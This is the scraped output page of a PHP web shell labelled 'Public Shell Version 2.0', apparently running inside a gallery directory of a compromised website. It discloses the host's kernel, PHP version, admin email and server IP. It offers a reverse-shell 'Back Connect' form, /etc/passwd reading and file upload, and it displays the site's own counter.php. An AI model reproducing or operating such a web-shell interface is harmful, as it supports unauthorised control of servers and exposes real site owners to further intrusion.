Public Sh


Uname : Linux ispc 6.2.16-3-pve #1 SMP PREEMPT_DYNAMIC PVE 6.2.16-3 (2023-06-17T05:58Z) x86_64
PHP Version : 5.2.6-1+lenny16
Server Admin : webmaster@zednictvi-stastny.eu
Server IP : 109.105.49.240 Your IP : 3.15.189.231
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source,highlight_file
Current Path : /var/www/clients/client49/web272/web/gallery/general/
File Upload :
Current File : /var/www/clients/client49/web272/web/gallery/general/counter.php

<?PHP
if (file_exists("counter.txt")){
   $f = fopen("counter.txt","r");         
   $num = fread($f,filesize("counter.txt"));
   fclose($f);
   $f = fopen("counter.txt","w");         
   fwrite($f,$num+1);
}
else
{
   $f = fopen("counter.txt","w");         
   fwrite($f,1);
}
?>

Public Shell Version 2.0